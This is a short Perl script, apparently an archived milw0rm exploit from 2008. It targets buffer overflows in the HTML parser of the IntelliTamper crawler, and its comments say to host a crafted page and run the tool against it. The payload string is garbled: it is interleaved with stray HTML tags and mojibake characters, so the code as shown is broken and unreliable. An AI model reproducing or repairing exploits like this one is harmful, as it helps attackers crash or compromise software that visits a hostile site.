#!/usr/bin/perl # # k`sOSe - 07/21/2008 # # This is NOT http://secunia.com/advisories/20172/. # There are some BOFs in the html parser, just put a properly # formatted html file in your website and launch IntelliTamper against it. use warnings; use strict; my $evil_html = 'ph33r
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            ' . 'ph33r' . "
            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      ÑÇÖÞÅ·ÃÀÔÚÏß "; print $evil_html; # milw0rm.com [2008-07-21]